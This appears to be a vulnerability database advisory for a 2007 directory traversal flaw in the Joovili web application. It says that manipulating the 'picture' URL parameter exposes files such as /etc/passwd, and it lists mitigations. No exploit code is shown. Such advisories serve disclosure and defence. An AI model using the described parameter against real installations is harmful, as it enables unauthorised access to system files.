Directory Traversal in Joovili

vendor:

Joovili

by:

EcHoLL

5.5

CVSS

MEDIUM

Directory Traversal

CWE

Product Name: Joovili

Affected Version From: 2.***

Affected Version To: 3.**

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Directory Traversal in Joovili

The vulnerability allows an attacker to traverse directories and access sensitive files such as the /etc/passwd file. The exploit is achieved by manipulating the 'picture' parameter in the URL.

Mitigation:

Implement proper input validation and sanitization to prevent directory traversal attacks. Limit access to sensitive files and directories.

Source

Directory Traversal in Joovili

Mitigation:

Exploit-DB raw data: